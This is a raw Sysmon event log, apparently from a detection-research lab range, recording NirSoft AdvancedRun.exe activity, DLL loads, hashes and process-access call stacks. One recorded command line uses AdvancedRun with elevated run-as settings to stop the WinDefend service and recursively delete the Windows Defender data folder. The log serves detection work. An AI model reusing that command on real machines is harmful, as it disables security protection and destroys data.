Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910312Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.219{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910303Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.219{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910282Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.204{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910247Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.188{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910232Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.173{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910227Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.188{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910206Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.157{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910181Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.157{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910159Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.157{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910150Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.188{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910149Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.173{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910148Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.173{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910128Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.094{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 734700x80000000000000003910121Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.094{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003910117Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.063{834264DD-DAF8-61EA-5B00-000000002702}41004280C:\Windows\system32\csrss.exe{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003910116Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.033{834264DD-E497-61EA-F301-000000002702}9444688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a283d8|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a2794aATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000003910115Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.040{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe"C:\Users\Administrator\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000002970304Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:23:59.707{834264DD-E0FF-61E9-1462-000000002402}1724C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "$env:TEMP\advancedrun\AdvancedRun.exe /EXEFilename "C:\Windows\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run & $env:TEMP\advancedrun\AdvancedRun.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /WindowState 0 /CommandLine "rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse" /StartDirectory "" /RunAs 8 /Run" C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-0DBE-61E7-0375-0C0000000000}0xc75032HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2{834264DD-0DCB-61E7-F800-000000002402}5296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000002968734Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.869{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeATTACKRANGE\Administrator 10341000x80000000000000002968733Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.869{834264DD-0AB0-61E7-1600-000000002402}12921804C:\Windows\system32\svchost.exe{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000002968732Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.869{834264DD-0AB0-61E7-1600-000000002402}12921804C:\Windows\system32\svchost.exe{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000002968679Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.706{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002968678Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.727{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002968601Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.668{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002968576Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.662{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002968551Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.651{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002968526Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.650{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002968501Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.624{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002968476Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.620{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000002968450Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.760{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E081-61E9-0362-000000002402}5344C:\Windows\servicing\TrustedInstaller.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21f3|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21bd|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968449Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.759{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E081-61E9-0362-000000002402}5344C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968448Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.759{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DCE0-61E9-5961-000000002402}7332C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968447Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.759{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-D73E-61E9-AF60-000000002402}6528C:\Program Files\Mozilla 